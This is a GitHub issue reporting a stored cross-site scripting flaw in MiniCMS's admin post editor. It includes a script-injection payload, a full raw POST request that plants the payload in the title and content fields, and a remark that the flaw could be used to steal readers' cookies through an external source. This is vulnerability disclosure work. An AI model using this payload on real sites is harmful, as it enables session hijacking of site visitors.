Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

This is a stored XSS vulnerability that we can easily get their cookie #17

Closed
Oran9e opened this issue Apr 22, 2018 · 0 comments
Closed

Comments

@Oran9e
Copy link

Oran9e commented Apr 22, 2018

This is a stored XSS vulnerability
first,we shoud land (http://127.0.0.1/test/MiniCMS-master/mc-admin/)
writing articles and published an article
payload :"/><script>confirm(document.cookie)</script>
i think you can see the following picture to konw more.

POST /test/MiniCMS-master/mc-admin/post-edit.php?id=qhywyf HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/MiniCMS-master/mc-admin/post-edit.php?id=qhywyf
Content-Type: application/x-www-form-urlencoded
Content-Length: 274
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6
Connection: keep-alive
Upgrade-Insecure-Requests: 1

IS_POST_BACK=&title="/><script>confirm(document.cookie)</script>&content="/><script>confirm(document.cookie)</script>&tags=&year=2018&month=04&day=22&hourse=11&minute=44&second=00&can_comment=1&state=publish&id=qhywyf&save=%E4%BF%9D%E5%AD%98
1

when we published the article and we can see it from homepage.
2

If people read our articles, we can easily get their cookie.
src=http://xxx.xxx.xxx.xxx/
3

@bg5sbk bg5sbk closed this as completed Jul 19, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants